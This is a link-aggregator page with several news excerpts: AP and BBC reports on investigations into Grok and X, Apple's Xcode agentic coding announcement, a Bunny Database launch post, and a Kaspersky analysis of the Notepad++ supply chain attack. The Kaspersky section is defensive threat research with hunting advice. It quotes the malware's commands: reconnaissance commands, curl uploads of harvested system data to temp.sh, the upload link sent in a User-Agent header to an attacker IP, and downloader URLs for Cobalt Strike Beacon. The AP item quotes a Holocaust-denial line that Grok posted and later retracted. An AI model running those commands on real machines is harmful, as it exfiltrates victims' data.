It ex­panded af­ter Grok gen­er­ated posts that al­legedly de­nied the Holocaust, a crime in France, and spread sex­u­ally ex­plicit deep­fakes, the state­ment said.

Grok wrote in a widely shared post in French that gas chambers at the Auschwitz-Birkenau death camp were designed for “disinfection with Zyklon B against typhus” rather than for mass murder — language long associated with Holocaust denial.

In later posts on X, the chat­bot re­versed it­self and ac­knowl­edged that its ear­lier re­ply was wrong, say­ing it had been deleted and pointed to his­tor­i­cal ev­i­dence that Zyklon B was used to kill more than 1 mil­lion peo­ple in Auschwitz gas cham­bers.

The chat­bot also ap­peared to praise Adolf Hitler last year, in com­ments that X took down af­ter com­plaints.

In Britain, the Information Commissioner’s Office said it’s looking into whether X and xAI followed the law when processing personal data and whether Grok had any measures in place to prevent its use to generate “harmful manipulated images.”

“The reports about Grok raise deeply troubling questions about how people’s personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this,” said William Malcolm, an executive director at the watchdog.

He did­n’t spec­ify what the penalty would be if the probe found the com­pa­nies did­n’t com­ply with data pro­tec­tion laws.

A separate investigation into Grok launched last month by the U.K. media regulator, Ofcom, is ongoing.

Ofcom said Tuesday it’s still gath­er­ing ev­i­dence and warned the probe could take months.

X has also been un­der pres­sure from the EU. The 27-nation bloc’s ex­ec­u­tive arm opened an in­ves­ti­ga­tion last month af­ter Grok spewed non­con­sen­sual sex­u­al­ized deep­fake im­ages on the plat­form.

Brussels has already hit X with a 120-million euro (then-$140 million) fine for shortcomings under the bloc’s sweeping digital regulations, including blue checkmarks that broke the rules on “deceptive design practices” that risked exposing users to scams and manipulation.

On Monday, Musk’s space exploration and rocket business, SpaceX, announced that it acquired xAI in a deal that will also combine Grok, X and his satellite communication company Starlink.

Associated Press writ­ers Nicolas Vaux-Montagny in Lyon, France, Mike Corder in The Hague, Netherlands, Sylvia Hui and Kelvin Chan in London con­tributed to this re­port.

...

Read the original on apnews.com »

7 281 shares, 18 trendiness

Xcode 26.3 unlocks the power of agentic coding

Developers can lever­age cod­ing agents, in­clud­ing Anthropic’s Claude Agent and OpenAI’s Codex, di­rectly in Xcode to tackle com­plex tasks au­tonomously, help­ing them de­velop apps faster than ever

Xcode 26.3 in­tro­duces sup­port for agen­tic cod­ing, a new way in Xcode for de­vel­op­ers to build apps us­ing cod­ing agents such as Anthropic’s Claude Agent and OpenAI’s Codex. With agen­tic cod­ing, Xcode can work with greater au­ton­omy to­ward a de­vel­op­er’s goals — from break­ing down tasks to mak­ing de­ci­sions based on the pro­ject ar­chi­tec­ture and us­ing built-in tools.

Expanding on the in­tel­li­gence fea­tures in­tro­duced in Xcode 26, which brought a brand-new cod­ing as­sis­tant for writ­ing and edit­ing in Swift, this re­lease gives cod­ing agents ac­cess to even more of Xcode’s ca­pa­bil­i­ties. Agents like Claude Agent and Codex can now col­lab­o­rate through­out the en­tire de­vel­op­ment life cy­cle, giv­ing de­vel­op­ers the power to stream­line work­flows, it­er­ate faster, and bring ideas to life like never be­fore. Agents can search doc­u­men­ta­tion, ex­plore file struc­tures, up­date pro­ject set­tings, and ver­ify their work vi­su­ally by cap­tur­ing Xcode Previews and it­er­at­ing through builds and fixes.

“At Apple, our goal is to make tools that put industry-leading technologies directly in developers’ hands so they can build the very best apps,” said Susan Prescott, Apple’s vice president of Worldwide Developer Relations. “Agentic coding supercharges productivity and creativity, streamlining the development workflow so developers can focus on innovation.”

With seamless access to Claude Agent and Codex, developers can bring the advanced reasoning of these models directly into their app-building workflow.[1] This connection combines the power of these agents with Xcode’s native capabilities to provide the best results when developing for Apple platforms, giving developers the flexibility to work with the model that best fits their project.

In addition to these built-in integrations, Xcode 26.3 makes its capabilities available through the Model Context Protocol, an open standard that gives developers the flexibility to use any compatible agent or tool with Xcode.

Xcode 26.3 is available as a release candidate for all members of the Apple Developer Program starting today, with a release coming soon on the App Store.

[1] Anthropic and OpenAI’s terms of service may apply.

...

Read the original on www.apple.com »

8 279 shares, 16 trendiness

X offices raided in France as UK opens fresh investigation into Grok

“The reports about Grok raise deeply troubling questions about how people’s personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this,” said William Malcolm, the ICO’s executive director for regulatory risk & innovation.

...

Read the original on www.bbc.com »

9 270 shares, 15 trendiness

The SQLite-Compatible Edge DB

Meet Bunny Database: the SQL service that just works

Don’t want to babysit your app database on a VM but not willing to pay the DBaaS tax either? We’re building a third way. Today, we’re launching Bunny Database as a public preview: a SQLite-compatible managed service that spins down when idle, keeps latency low wherever your users are, and doesn’t cost a fortune.

So what’s the deal with database services in 2026?

It’s become clear by now that the DBaaS platforms that garnered the love of so many devs are all going upmarket. Removing or dumbing down free tiers, charging for unused capacity, charging extra for small features, or bundling them in higher tiers — you already know the drill.

Hard to blame anyone for growing their business, but it doesn’t feel right when these services stop making sense for the very people who helped popularize them in the first place.

So where does that leave you?

Like SQLite, but for the web

Not every project needs Postgres, and that’s okay. Sometimes you just want a simple, reliable database that you can spin up quickly and build on, without worrying it’ll hit your wallet like an EC2.

That’s what we built Bunny Database for.

What you get:

* One-click deployment: just name your database and go, no config needed

* Language-specific tooling: SDKs for TS/JS, Go, Rust, and .NET help you handle the boring bits

* Low latency anywhere: replication regions let you serve reads close to your users

* Works over HTTP: wire up anything you’d like

* Database editor: insert data or run queries on the spot

* Affordable, pay-as-you-go pricing: only pay for what you use, but without the serverless tax

Get the full tour including how to connect Bunny Database to your app in this quick demo from our DX Engineer, Jamie Barton:

Why care about database latency anyway?

You probably optimize the heck out of your frontend, APIs, and caching layers, all for the sake of delivering an experience that feels instant to your users. But when your database is far away from them, round-trip time starts to add noticeable latency.

The usual fix is to introduce more caching layers, denormalized reads, or other workarounds. That’s obviously no fun.

And when you think about it, devs end up doing this because the popular DBaaS platforms are usually either limited, complex, or too costly when it comes to multi-region deployments. So what looks like a caching problem is actually a data locality issue.

OK, but how bad can it really be?

To find out, we ran a read latency benchmark and measured p95 latency in Bunny Database.

We picked a number of regions across the world and compared round-trip time for client locations ever farther away from the database in:

Turns out serving reads close to clients reduced latency by up to 99%.

Check out the full write-up on the benchmark setup and results here.

While this definitely matters most to apps with global users, data locality does apply to everyone. With Bunny Database, you don’t have to stick to major data center locations and compensate with caching workarounds any more. Instead, you get a lot of flexibility to set up regions in an intuitive interface and it’s easy to switch things up as your requirements change.

* Automatic region selection gives you one-click deployment with minimal latency. Bunny Database will select regions for you based on your IP address (you can check and tweak the selection in settings later).

* Single-region deployment lets you pick one of 41 regions available worldwide (check the full list here).

* Manual region selection gives you custom multi-region setup, where you can freely pick regions that make the most sense for your audience.

All of this lets you start wherever you’d like and add regions as needed, without re-architecting your app.

Usage-based pricing, but without the serverless tax

In the database world, capacity-based pricing gives you some predictability. But no one likes to pay for unused capacity, right?

Serverless, on the other hand, is supposed to be cost-efficient, yet can rack up bills quickly, especially when the DBaaS charges significant markups on top of already pricey compute.

We don’t do hyperscalers, though, so we can charge a fair price for Bunny Database in a usage-based model.

* When not getting requests, Bunny Database only incurs storage costs. One primary region is charged continuously, while read replicas only add storage costs when serving traffic (metered by the hour)

* Your usage is charged continuously (pay-as-you-go) and invoiced monthly

* During the public preview phase, Bunny Database is free.

Wait, what does “SQLite-compatible” actually mean?

Bunny Database wouldn’t be possible without libSQL, the open-source, open-contribution fork of SQLite created by Turso.

We run Bunny Database on our own fork of libSQL, which gives us the freedom to integrate it tightly with the bunny.net platform and handle the infrastructure and orchestration needed to run it as a managed, multi-region service.

What does this mean for Bunny Database’s upstream feature parity with libSQL and SQLite, respectively?

The short answer is that we don’t currently promise automatic or complete feature parity with either upstream libSQL or the latest SQLite releases.

While libSQL aims to stay compatible with SQLite’s API and file format, it doesn’t move in lockstep with upstream SQLite. We wouldn’t expect otherwise, especially as Turso has shifted focus from libSQL toward a long-term rewrite of SQLite in Rust.

For Bunny Database, this means that compatibility today is defined by the libSQL version we’re built on, rather than by chasing every upstream SQLite or libSQL change as it lands. We haven’t pulled in any upstream changes yet, and we don’t currently treat upstream parity as an automatic goal.

That’s intentional. Our focus so far has been on making Bunny Database reliable and easy to operate as a service. We think bringing in upstream changes only makes sense when they clearly improve real-world use cases, not just to tick a parity checkbox.

If there are specific libSQL features you’d like to see exposed in Bunny Database, or recent SQLite features you’d want us to pull in, we’d love to hear about it. Join our Discord to discuss your use cases and help shape the roadmap!

Speaking of the roadmap, we don’t stop cooking. Here’s what’s coming up next:

There’s even more to come, but it’s too soon to spill the beans yet, especially while we’re in public preview. We’d love to hear your feedback, so we can shape what ships next together.

Bunny Database works standalone and fits right into your stack via the SDKs (or you can hook up anything using the HTTP API). But it also plays nicely with Bunny Edge Scripting and Bunny Magic Containers.

To connect your database to an Edge Script or a Magic Containers app, simply go to the Access tab of the chosen database and click Generate Tokens to create new access credentials for it.

Once they’re generated, you’ll get two paths to choose from:

* Click Add Secrets to an Edge Script and select the one you’d like to connect from the list. You’ll also need to import the libSQL TypeScript client and use the provided code snippet to connect it to your database.

* Click Add Secrets to Magic Container App and select the one you’d like to connect from the list. You’ll also need to connect to the database from your app using one of the client libraries or the HTTP API.

After you complete the setup, the database URL and access token will be available as environment variables in your script or app. Use them to connect to your database:

You can find more detailed, step-by-step integration instructions in the docs:

We can’t wait to see what you’ll build with Bunny Database and what you think of it. During the public preview phase, you get 50 databases per user account, each capped at 1 GB, but we hope this should be more than enough for lots of fun projects.

Just sign in to the bunny.net dashboard to get started. Happy building!

...

Read the original on bunny.net »

10 242 shares, 21 trendiness

The Notepad++ supply chain attack – unnoticed execution chains and new IoCs

On February 2, 2026, the de­vel­op­ers of Notepad++, a text ed­i­tor pop­u­lar among de­vel­op­ers, pub­lished a state­ment claim­ing that the up­date in­fra­struc­ture of Notepad++ has been com­pro­mised. According to the state­ment, this was due to a host­ing provider level in­ci­dent, which oc­curred from June to September 2025. However, at­tack­ers were able to re­tain ac­cess to in­ter­nal ser­vices un­til December 2025.

Having checked our telemetry related to this incident, we were amazed to find how different and unique the execution chains used in this supply chain attack were. We identified that over the course of four months, from July to October 2025, the attackers who compromised Notepad++ constantly rotated the C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, and the final payloads.

We ob­served three dif­fer­ent in­fec­tion chains over­all de­signed to at­tack about a dozen ma­chines, be­long­ing to:

* An IT ser­vice provider or­ga­ni­za­tion lo­cated in Vietnam.

Despite the va­ri­ety of pay­loads ob­served, Kaspersky so­lu­tions have been able to block the iden­ti­fied at­tacks as they oc­curred.

In this ar­ti­cle, we de­scribe the va­ri­ety of the in­fec­tion chains we ob­served in the Notepad++ sup­ply chain at­tack, as well as pro­vide nu­mer­ous pre­vi­ously un­pub­lished IoCs re­lated to it.

We first observed attackers deploying a malicious Notepad++ update in late July 2025. It was hosted at http://45.76.155[.]202/update/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.

The update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, GUP.exe. This file turned out to be an NSIS installer of about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

The file creates a directory named %appdata%\ProShow and sets it as the current directory;

It executes the shell command cmd /c whoami&&tasklist > 1.txt, thus creating a file with the shell command execution results in the %appdata%\ProShow directory;

Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;

Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent https://temp.sh/ZMRKV/1.txt -s http://45.76.155[.]202 shell command. As can be observed, the uploaded file URL is transferred inside the user agent.

Notably, the same be­hav­ior of ma­li­cious Notepad++ up­dates, specif­i­cally the launch of shell com­mands and the use of the temp[.]sh web­site for file up­load­ing, has been de­scribed on the Notepad++ com­mu­nity fo­rums by a user named soft-pars­ley.

After send­ing sys­tem in­for­ma­tion, the up­date.exe file ex­e­cutes the sec­ond-stage pay­load. To do that, it per­forms the fol­low­ing ac­tions:

* Drops the fol­low­ing files to the %appdata%\ProShow di­rec­tory:

The launched ProShow.exe file is a le­git­i­mate ProShow soft­ware, which is abused to launch a ma­li­cious pay­load. Normally, when threat ac­tors aim to ex­e­cute a ma­li­cious pay­load in­side a le­git­i­mate process, they re­sort to the DLL side­load­ing tech­nique. However, this time at­tack­ers have de­cided to avoid us­ing it — likely due to how much at­ten­tion this tech­nique re­ceives nowa­days. Instead, they abused an old, known vul­ner­a­bil­ity in the ProShow soft­ware, which dates back to early 2010s. The dropped file named load con­tains an ex­ploit pay­load, which is launched when the ProShow.exe file is launched. It is worth not­ing that, apart from this pay­load, all files in the %appdata%\ProShow di­rec­tory are le­git­i­mate.

Analysis of the ex­ploit pay­load re­vealed that it con­tains two shell­codes — one at the very start and the other one in the mid­dle of the file. The shell­code lo­cated at the start of the file con­tains a set of mean­ing­less in­struc­tions and is not de­signed to be ex­e­cuted — rather, at­tack­ers used it as the ex­ploit padding bytes. It is likely that, by us­ing a fake shell­code for padding bytes in­stead of some­thing else (e.g., a se­quence of 0x41 char­ac­ters or ran­dom bytes), at­tack­ers aimed to con­fuse re­searchers and au­to­mated analy­sis sys­tems.

The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.

The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.

Later on, in early August 2025, we observed attackers using the same download URL for the update.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:

* In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to https://cdncheck.it[.]com/users/admin;

* The Cobalt Strike C2 server URLs were set to https://cdncheck.it[.]com/api/update/v1 and https://cdncheck.it[.]com/api/Metadata/submit.

We have not seen any further infections leveraging chain #1 after early August 2025.

A month and a half after malicious update detections ceased, we observed attackers resuming deployment of these updates in the middle of September 2025, using another infection chain. The malicious update was still being distributed from the http://45.76.155[.]202/update/update.exe URL, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. Again, this file performed two actions:

* Obtained sys­tem in­for­ma­tion by ex­e­cut­ing a shell com­mand and up­load­ing its ex­e­cu­tion re­sults to temp[.]sh;

* Dropped a next-stage pay­load on disk and launched it.

Regarding sys­tem in­for­ma­tion, at­tack­ers made the fol­low­ing changes to how it was col­lected:

* They changed the work­ing di­rec­tory to %APPDATA%\Adobe\Scripts;

* They started collecting more system information details, changing the executed shell command to cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt.

The created a.txt file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same http://45.76.155[.]202/list endpoint, inside the User-Agent header.

As for the next-stage pay­load, it has been changed com­pletely. The NSIS in­staller was con­fig­ured to drop the fol­low­ing files to the %APPDATA%\Adobe\Scripts di­rec­tory:

Next, it executes the following shell command to launch the script.exe file: %APPDATA%\Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.

All of the files in the %APPDATA%\Adobe\Scripts di­rec­tory, ex­cept for alien.ini, are le­git­i­mate and re­lated to the Lua in­ter­preter. As such, the pre­vi­ously men­tioned com­mand is used by at­tack­ers to launch a com­piled Lua script, lo­cated in the alien.ini file. Below is a screen­shot of its de­com­pi­la­tion:

As we can see, this small script is used for plac­ing shell­code in­side ex­e­cutable mem­ory and then launch­ing it through the EnumWindowStationsW API func­tion.

The launched shellcode is, just as in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of a shellcode, from the https://cdncheck.it[.]com/users/admin URL.

The Cobalt Strike payload contains C2 server URLs that differ slightly from the ones seen previously: https://cdncheck.it[.]com/api/getInfo/v1 and https://cdncheck.it[.]com/api/FileUpload/submit.

Attacks involving chain #2 continued until the end of September, when we observed two more malicious update.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September; however, attackers changed the way system information was collected. Specifically, attackers split the single shell command they used for this (cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt) into multiple commands:

Notably, the same se­quence of com­mands has been pre­vi­ously doc­u­mented by the soft-pars­ley user on the Notepad++ com­mu­nity fo­rums.

The other up­date.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, at­tack­ers per­formed the fol­low­ing:

* Changed the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;

* Changed the URL used by the Metasploit downloader to https://safe-dns.it[.]com/help/Get-Start;

* Changed the Cobalt Strike Beacon C2 server URLs to https://safe-dns.it[.]com/resolve and https://safe-dns.it[.]com/dns-query.

In early October 2025, attackers changed the infection chain once again. They also changed the C2 server for distributing malicious updates, with the observed update URL being http://45.32.144[.]255/update/update.exe. The payload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still an NSIS installer; however, unlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It simply dropped the following files to the %appdata%\Bluetooth\ directory:

This ex­e­cu­tion chain re­lies on the side­load­ing of the log.dll file, which is re­spon­si­ble for launch­ing the en­crypted BluetoothService shell­code into the BluetoothService.exe process. Notably, such ex­e­cu­tion chains are com­monly used by Chinese-speaking threat ac­tors. This par­tic­u­lar ex­e­cu­tion chain has al­ready been de­scribed by Rapid7, and the fi­nal pay­load ob­served in it is the cus­tom Chrysalis back­door.

Unlike the pre­vi­ous chains, chain #3 does not load a Cobalt Strike Beacon di­rectly. However, in their ar­ti­cle Rapid7 claim that they ad­di­tion­ally ob­served a Cobalt Strike Beacon pay­load be­ing de­ployed to the C:\ProgramData\USOShared folder, while con­duct­ing in­ci­dent re­sponse on one of the ma­chines in­fected with the Notepad++ sup­ply chain at­tack. Whilst Rapid7 does not de­tail how this file was dropped to the vic­tim ma­chine, we can high­light the fol­low­ing sim­i­lar­i­ties be­tween that Beacon pay­load and the Beacon pay­loads ob­served in chains #1 and #2:

* In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard[.]com/users/admin for the Rapid7 payload, cdncheck.it[.]com/users/admin and http://45.77.31[.]210/users/admin for chain #1 and chain #2 payloads);

* The Beacon configurations are encrypted with the XOR key CRAZY;

* Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard[.]com/api/FileUpload/submit for the Rapid7 payload and https://45.77.31[.]210/api/FileUpload/submit for the chain #1 payload).

In mid-October 2025, we observed attackers resuming deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http://95.179.213[.]0/update/update.exe. Still, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system information uploading, Metasploit downloader and Cobalt Strike Beacon communications.

Further, in late October 2025, we observed attackers starting to change the URLs used for malicious update deliveries. Specifically, attackers started using the following URLs:

We haven’t observed any new payloads deployed from these URLs; they involved usage of both the #2 and #3 execution chains. Finally, we have not seen any payloads being deployed starting from November 2025.

Notepad++ is a text ed­i­tor used by nu­mer­ous de­vel­op­ers. As such, the abil­ity to con­trol up­date servers of this soft­ware gave at­tack­ers a unique pos­si­bil­ity to break into ma­chines of high-pro­file or­ga­ni­za­tions around the world. The at­tack­ers made an ef­fort to avoid los­ing ac­cess to this in­fec­tion vec­tor — they were spread­ing the ma­li­cious im­plants in a tar­geted man­ner, and they were skilled enough to dras­ti­cally change the in­fec­tion chains about once a month. Whilst we iden­ti­fied three dis­tinct in­fec­tion chains dur­ing our in­ves­ti­ga­tion, we would not be sur­prised to see more of them in use. To sum up our find­ings, here is the over­all time­line of the in­fec­tion chains that we iden­ti­fied:

The va­ri­ety of in­fec­tion chains makes de­tec­tion of the Notepad++ sup­ply chain at­tack quite a dif­fi­cult and at the same time cre­ative task. We would like to pro­pose the fol­low­ing meth­ods, from generic to spe­cific, to hunt down traces of this at­tack:

* Check sys­tems for de­ploy­ments of NSIS in­stallers, which have been used in all three ob­served ex­e­cu­tion chains. For ex­am­ple, this can be done by look­ing for logs re­lated to cre­ations of the %localappdata%\Temp\ns.tmp di­rec­tory, made by NSIS in­stallers at run­time. Make sure to in­ves­ti­gate the ori­gins of each iden­ti­fied NSIS in­staller to avoid false pos­i­tives;

* Check net­work traf­fic logs for DNS res­o­lu­tions of the temp[.]sh do­main, which is un­usual to ob­serve in cor­po­rate en­vi­ron­ments. Also, it is ben­e­fi­cial to con­duct a check for raw HTTP traf­fic re­quests that have a temp[.]sh URL em­bed­ded in the user agent — both these steps will make it pos­si­ble to de­tect chain #1 and chain #2 de­ploy­ments;

* Check systems for launches of malicious shell commands referenced in the article, such as whoami, tasklist, systeminfo and netstat -ano;

* Use spe­cific IoCs listed be­low to iden­tify known ma­li­cious do­mains and files.
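The hunting steps listed above can be expressed as rules over normalised endpoint and network events. The following is an added example, not code from the article: the event schema, rule names, alert threshold and all sample events are constructed assumptions, and the recon rule aggregates per host so that commands split across separate launches are still caught.

```python
import re

# temp.sh as a whole hostname inside a URL, command line or header value.
TEMP_SH = re.compile(r"(?<![\w.-])temp\.sh(?![\w.-])", re.I)
# Runtime directory created by NSIS installers under %localappdata%\Temp.
# Assumption: the "ns" prefix may be followed by random characters.
NSIS_TMP = re.compile(r"\\AppData\\Local\\Temp\\ns[^\\]*\.tmp\\?$", re.I)
# Reconnaissance commands named in the article.
RECON = re.compile(r"\b(whoami|tasklist|systeminfo|netstat\s+-ano)\b", re.I)
RECON_THRESHOLD = 2  # assumed: distinct recon commands per host before alerting


def hunt(events):
    """Return {host: sorted rule names} for hosts where at least one rule fired."""
    hits, recon = {}, {}
    for ev in events:
        host, kind = ev["host"], ev["kind"]
        fired = hits.setdefault(host, set())
        if kind == "dir_create":
            if NSIS_TMP.search(ev.get("path", "")):
                fired.add("nsis_temp_dir")
        elif kind == "dns":
            name = ev.get("query", "").lower().rstrip(".")
            if name == "temp.sh" or name.endswith(".temp.sh"):
                fired.add("temp_sh_dns")
        elif kind == "http":
            # Chains #1 and #2 carried the uploaded file URL in the User-Agent.
            if TEMP_SH.search(ev.get("user_agent", "")):
                fired.add("temp_sh_url_in_user_agent")
        elif kind == "process":
            cmd = ev.get("cmdline", "")
            if "curl" in ev.get("image", "").lower() and TEMP_SH.search(cmd):
                fired.add("curl_to_temp_sh")
            # Collect recon commands per host: one chained command line and
            # several separate launches end up in the same set.
            for match in RECON.findall(cmd):
                recon.setdefault(host, set()).add(" ".join(match.lower().split()))
    for host, commands in recon.items():
        if len(commands) >= RECON_THRESHOLD:
            hits[host].add("recon_command_burst")
    return {host: sorted(rules) for host, rules in hits.items() if rules}


CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # all events below are constructed for illustration
    # ws-01: mirrors the chain #1 behaviour described in the article
    {"host": "ws-01", "kind": "dir_create",
     "path": r"C:\Users\alice\AppData\Local\Temp\nsA1B2.tmp"},
    {"host": "ws-01", "kind": "process", "image": CMD,
     "cmdline": "cmd /c whoami&&tasklist > 1.txt"},
    {"host": "ws-01", "kind": "process",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl.exe -F "file=@1.txt" -s https://temp.sh/upload'},
    {"host": "ws-01", "kind": "dns", "query": "temp.sh."},
    {"host": "ws-01", "kind": "http", "dest": "203.0.113.10",
     "user_agent": "https://temp.sh/ZMRKV/1.txt"},
    # ws-02: recon commands launched one by one instead of chained
    {"host": "ws-02", "kind": "process", "image": CMD,
     "cmdline": "cmd /c whoami >> a.txt"},
    {"host": "ws-02", "kind": "process", "image": CMD,
     "cmdline": "cmd /c tasklist >> a.txt"},
    {"host": "ws-02", "kind": "process", "image": CMD,
     "cmdline": "cmd /c systeminfo >> a.txt"},
    {"host": "ws-02", "kind": "process", "image": CMD,
     "cmdline": "cmd /c netstat  -ano >> a.txt"},
    # ws-03: benign look-alikes that must not alert
    {"host": "ws-03", "kind": "process", "image": CMD,
     "cmdline": 'tasklist /fi "imagename eq chrome.exe"'},
    {"host": "ws-03", "kind": "dns", "query": "mytemp.sh"},
    {"host": "ws-03", "kind": "http", "dest": "203.0.113.20",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    {"host": "ws-03", "kind": "dir_create",
     "path": r"C:\Users\bob\AppData\Local\Temp\msi-cache"},
]

if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(host, rules)
```

As the article notes for NSIS installers, each hit still needs its origin investigated; the recon threshold in particular should be tuned against administrator activity in the environment.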


...

Read the original on securelist.com »
